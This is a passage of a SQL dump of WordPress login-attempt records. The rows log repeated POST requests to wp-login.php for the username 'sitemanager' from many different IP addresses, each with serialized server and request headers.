00:00:00'),(94062,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50296\";s:11:\"REMOTE_ADDR\";s:12:\"68.66.220.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745476129.7995551;s:12:\"REQUEST_TIME\";i:1745476129;}}','68.66.220.30',0,'2025-04-24 11:58:51','1970-01-01 00:00:00'),(94063,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54654\";s:11:\"REMOTE_ADDR\";s:11:\"34.93.16.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745476479.1918509;s:12:\"REQUEST_TIME\";i:1745476479;}}','34.93.16.66',0,'2025-04-24 12:04:41','1970-01-01 00:00:00'),(94064,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49746\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745476833.3827541;s:12:\"REQUEST_TIME\";i:1745476833;}}','68.65.122.143',0,'2025-04-24 12:10:35','1970-01-01 00:00:00'),(94065,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60106\";s:11:\"REMOTE_ADDR\";s:12:\"144.76.3.233\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745477182.266726;s:12:\"REQUEST_TIME\";i:1745477182;}}','144.76.3.233',0,'2025-04-24 12:16:24','1970-01-01 00:00:00'),(94066,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47960\";s:11:\"REMOTE_ADDR\";s:14:\"103.118.29.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745477534.2202041;s:12:\"REQUEST_TIME\";i:1745477534;}}','103.118.29.120',0,'2025-04-24 12:22:16','1970-01-01 00:00:00'),(94067,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"25118\";s:11:\"REMOTE_ADDR\";s:12:\"50.63.24.239\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745477882.2575841;s:12:\"REQUEST_TIME\";i:1745477882;}}','50.63.24.239',0,'2025-04-24 12:28:04','1970-01-01 00:00:00'),(94068,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58566\";s:11:\"REMOTE_ADDR\";s:12:\"91.238.162.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745478239.8794429;s:12:\"REQUEST_TIME\";i:1745478239;}}','91.238.162.8',0,'2025-04-24 12:34:01','1970-01-01 00:00:00'),(94069,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48160\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.172.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745478599.861274;s:12:\"REQUEST_TIME\";i:1745478599;}}','103.161.172.148',0,'2025-04-24 12:40:01','1970-01-01 00:00:00'),(94070,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53622\";s:11:\"REMOTE_ADDR\";s:13:\"51.178.81.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745478963.9617519;s:12:\"REQUEST_TIME\";i:1745478963;}}','51.178.81.248',0,'2025-04-24 12:46:05','1970-01-01 00:00:00'),(94071,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42200\";s:11:\"REMOTE_ADDR\";s:11:\"195.7.5.237\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745479325.0036931;s:12:\"REQUEST_TIME\";i:1745479325;}}','195.7.5.237',0,'2025-04-24 12:52:06','1970-01-01 00:00:00'),(94072,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59444\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"H